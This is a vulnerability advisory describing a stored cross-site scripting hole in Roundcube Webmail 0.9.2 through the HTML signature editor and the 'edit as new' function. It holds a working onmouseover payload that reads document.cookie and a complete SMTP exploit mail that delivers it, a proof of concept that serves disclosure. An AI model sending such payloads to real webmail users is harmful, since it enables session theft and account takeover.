Roundcube Webmail 0.9.2 Cross Site Scripting

`* Roundcube Webmail 0.9.2 XSS Vulnerability  
* ========================================================  
*  
* Site: http://www.roundcube.net  
* Discovered by: Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==)  
* Follow me: http://www.linkedin.com/in/andreamenin  
*  
* ========================================================  
  
  
Report-Timeline:  
----------------  
2013-07-18: Reported on Roundcube Track system (#1489251)  
  
  
Introduction:  
-------------  
Roundcube webmail is a browser-based multilingual IMAP client  
with an application-like user interface. It provides full  
functionality you expect from an e-mail client, including  
MIME support, address book, folder manipulation, message  
searching and spell checking.  
  
  
Description:  
------------  
i've found a XSS Vulnerability inside the "identity" configuration page.  
Into the "Sign" textarea, enabling HTML Sign, i've click on "HTML" button  
on the editor and i've write this HTML code:  
  
test<b onmouseover="alert(document.cookie)">asd</b>  
  
once you save it, when you move your mouse on the word "asd", the  
JavaScript "alert(document.cookie)" will be executed by the client. Every  
time you visit the "identity configuration page" the XSS is active.  
  
when you save the new "html sign" and write a new html mail, the  
XSS is still present and when you move your mouse over the sign, the  
JavaScript XSS code will be executed by the client (see the attachments).  
  
This Vulnerability is also present when the end user, receiving a mail  
with this kind of "malicious" javascript code, clicks on "edit as new"  
button. After click on it, the JavaScript will be executed by the client.  
  
  
Exploit mail (tested by telnet on my MTA):  
------------------------------------------  
  
HELO foobar.it  
MAIL FROM: [email protected]  
RCPT TO: [email protected]  
DATA  
From: Jesus <[email protected]>  
To: [email protected]  
Subject: test   
Content-Transfer-Encoding: quoted-printable  
Content-Type: text/html; charset="iso-8859-1"  
  
hey pope, edit this mail as new,   
and send it to all your friends!  
  
<b onmouseover=alert(document.cookie)>put your mouse over here</b>  
  
.  
  
  
Screenshot XSS Vulnerability:  
-----------------------------  
http://goo.gl/akomO  
http://goo.gl/jpp83  
  
  
CREDITS:  
---------  
This vulnerabilities has been discovered  
by Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==)  
  
  
LEGAL NOTICES:  
---------------  
The Author accepts no responsibility for any damage  
caused by the use or misuse of this information.  
`